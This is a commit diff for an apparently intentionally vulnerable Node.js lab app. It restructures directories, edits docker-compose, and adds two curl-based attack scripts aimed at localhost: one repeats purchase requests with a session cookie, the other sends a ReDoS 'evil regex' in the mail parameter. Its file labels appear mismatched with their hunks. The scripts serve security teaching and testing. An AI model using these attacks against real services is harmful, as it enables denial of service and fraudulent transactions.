change: restructured directory structure to aims to put package.json at root of project. The reason is because the major of NodeJS security products has this restriction for a correct analysis of sources.

Change: docker-compose to adapt to new structure.
Add: New readme in attacks folder to explains what contain this folder.

Author: cr0hn

web/Dockerfile renamed to Dockerfile

@@ -0,0 +1,11 @@
+#!/usr/bin/env bash
+
+# Put here your cookie session value, like:
+#COOKIE="Cookie: connect.sid=s%3AM9Ddp0pSbLOrBbgz9V6v2UhZMs1zTbTy.kS5d8QwFWge7FRH7KbveH2QLf6rAYvBft75nU6jgLzQ"
+COOKIE=""
+TARGET="http://127.0.0.1:3000"
+
+for i in $(seq 10);
+do
+    curl "$TARGET/products/[email protected]&address=aaa&ship_date=10/10/2016&phone=1111111&product_id=2&product_name=product%20name&username=admin&price=1" -H "$COOKIE";
+done

web/app.js renamed to app.js

@@ -0,0 +1,15 @@
+#!/usr/bin/env bash
+
+#
+# Evil regex: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
+# Insert point: /products/buy
+# Vulnerable parameter: mail
+#
+
+# Put here your cookie session value, like:
+#COOKIE="Cookie: connect.sid=s%3AM9Ddp0pSbLOrBbgz9V6v2UhZMs1zTbTy.kS5d8QwFWge7FRH7KbveH2QLf6rAYvBft75nU6jgLzQ"
+COOKIE=""
+EVIL_REGEX="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
+TARGET="http://127.0.0.1:3000"
+
+curl "$TARGET/products/buy?mail=$EVIL_REGEX&address=asdfasdf&ship_date=10/10/2016&phone=1111111&product_id=2&product_name=product%20name&username=admin&price=1" -H "$COOKIE"

attacks/README.md

@@ -2,7 +2,7 @@ version: '2'
 services:
   vulnerable_node:
     restart: always
-    build: ./web
+    build: .
     ports:
       - "3000:3000"
 #    links:
@@ -14,4 +14,4 @@ services:
     restart: always
     build: ./services/postgresql
     ports:
-      - "5432:5432"
+      - "5432:5432"